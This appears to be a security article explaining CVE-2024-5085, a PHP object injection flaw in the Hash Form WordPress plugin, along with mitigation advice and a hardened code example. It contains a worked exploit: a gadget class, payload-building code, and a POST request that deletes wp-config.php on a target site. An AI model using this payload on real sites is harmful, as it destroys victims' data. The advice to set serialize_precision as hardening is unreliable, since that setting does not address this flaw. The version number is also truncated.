CVE-2024-5085 - PHP Object Injection Vulnerability in Hash Form – Drag & Drop Form Builder WordPress Plugin (Up to 1.1.)

A serious vulnerability, tracked as CVE-2024-5085, was discovered in the popular WordPress plugin Hash Form – Drag & Drop Form Builder. All versions up to and including 1.1. are affected. The flaw is a PHP Object Injection: the plugin's process_entry function unserializes user input without validating it first.

In this article, we’ll break down how this vulnerability works, what the risks are, and how you can stay safe. We’ll also go over example exploit details and provide further reading material.

What is PHP Object Injection?

PHP Object Injection is a security flaw that allows attackers to inject crafted serialized data and force the application to create instances of PHP classes with user-controlled properties. If the application uses unserialize() on user input without proper validation, an attacker can send malicious objects to the system. If the loaded classes form a "POP chain" (Property-Oriented-Programming chain), attackers could take destructive actions like deleting files or even running arbitrary code.

What’s Wrong with Hash Form?

The Hash Form plugin unsafely handles user data with the unserialize function in the process_entry method. This deserialization of untrusted input opens the door for object injection attacks.

Here’s a simplified view of what’s happening in the affected code:

function process_entry() {
    $entry_data = $_POST['entry_data']; // Untrusted input from the web
    $data = unserialize($entry_data);   // Directly unserializing user data
    // ... process $data ...
}

An attacker can craft a POST request, setting entry_data to a malicious serialized object. When the plugin unserializes it, the attacker’s object gets loaded.
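The process_entry sketch above beside a hardened version, as an added example that is not the plugin's own code; the FileDeleter gadget class and the two request bodies are constructed for the demonstration, and the field name entry_data is taken from the sketch:

```php
<?php
// Added example, not code from the Hash Form plugin. It contrasts the unsafe
// pattern sketched above with a hardened handler. FileDeleter is a constructed
// stand-in for a gadget class some other plugin or theme might define; here it
// only echoes and deletes nothing.

class FileDeleter {
    public $file;
    public function __destruct() {
        echo "FileDeleter::__destruct ran for: {$this->file}\n";
    }
}

// Unsafe: any class loaded on the site can be instantiated by the request body.
function process_entry_unsafe(array $post) {
    return unserialize($post['entry_data']);
}

// Hardened: allowed_classes => false turns every object in the payload into a
// __PHP_Incomplete_Class, so no __wakeup/__destruct of a real class can run.
// Better still is to not accept PHP-serialized data from the client at all
// (JSON, for instance), but this is the minimal change for an existing call.
function process_entry_hardened(array $post) {
    $raw = $post['entry_data'] ?? null;
    if (!is_string($raw) || $raw === '') {
        return null;
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if ($data === false && $raw !== 'b:0;') {
        return null; // malformed or rejected input
    }
    return $data;
}

// Constructed request bodies: an object-injection payload and a benign array.
$attack = ['entry_data' => 'O:11:"FileDeleter":1:{s:4:"file";s:13:"some-file.txt";}'];
$benign = ['entry_data' => serialize(['name' => 'alice', 'msg' => 'hello'])];

// Unsafe path: a real FileDeleter is created and its destructor fires on release.
$obj = process_entry_unsafe($attack);
unset($obj);

// Hardened path: the same payload yields an inert incomplete-class object,
// while ordinary array data still round-trips.
$safe = process_entry_hardened($attack);
var_dump($safe instanceof __PHP_Incomplete_Class);
var_dump(process_entry_hardened($benign));
```

Run it with `php` on the command line; the only time the destructor message appears is on the unsafe path.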

What’s the catch?

On its own, this plugin doesn’t appear to load any classes dangerous enough for an attacker to create a "POP chain" (a chain of magic methods like __destruct or __wakeup that do something malicious using attacker-controlled data).

But: If the website runs other plugins or themes that implement such classes, an attacker could exploit this bug to trigger those chains and escalate the attack, possibly:

Crafting a Simple Exploit

Here’s an example of how an attacker might try to exploit this, provided a vulnerable class exists:

Step 1: Suppose another plugin or theme has this class:

class FileDeleter {
    public $file;

    function __destruct() {
        if (file_exists($this->file)) {
            unlink($this->file); // Deletes any file
        }
    }
}

Step 2: Craft a payload

The attacker could serialize an object that sets the $file property to the path they want to delete:

<?php
// Assumes the FileDeleter class from Step 1 is defined or autoloadable here.
$payload = serialize(new FileDeleter());
// Replace the null $file property (N;) with a string; the length prefix must
// match the path exactly, and "/var/www/html/wp-config.php" is 27 characters.
$payload = str_replace("N;", 's:27:"/var/www/html/wp-config.php";', $payload);
echo $payload;
?>

Step 3: Send a POST request to the target site (assuming a form that triggers process_entry):

POST /wp-admin/admin-ajax.php?action=hashform_process_form HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

entry_data=O:11:"FileDeleter":1:{s:4:"file";s:27:"/var/www/html/wp-config.php";}

If the FileDeleter class is autoloaded by any plugin or theme, the file gets deleted when the object is destroyed.

NOTE: The above is for illustration. DO NOT conduct attacks without permission.

What Should You Do?

- Update Hash Form plugin: Upgrade immediately when a patch is available. As of now, avoid all versions up to and including 1.1.
- Audit your site: Check for installed plugins or themes that accept user data and handle object deserialization or have dangerous magic methods.
- Limit plugin exposure: Remove unnecessary plugins/themes, especially poorly maintained ones.
- Monitor: Watch your logs for suspicious POST requests or signs of exploitation.
- Harden PHP: Set serialize_precision and disable features like allow_url_include for extra protection.

References

- Patchstack Advisory - CVE-2024-5085
- WPScan - Advisory 330b7dcf-9c83-4f42-a188-df489b3d9c90
- OWASP: PHP Object Injection
- PHP.net - unserialize

Conclusion

CVE-2024-5085 in the Hash Form plugin highlights the dangers of deserializing untrusted input. While the default plugin may not be directly exploitable, it creates a ticking time bomb if combined with other vulnerable software on your WordPress site. Always keep your plugins up to date and avoid using plugins/themes from untrusted sources.

Stay secure!

*This article is for educational purposes only. Respect ethical guidelines and only test vulnerabilities on systems you own or with explicit permission.*

Timeline

Published on: 05/23/2024 15:15:16 UTC
Last modified on: 06/04/2024 18:02:27 UTC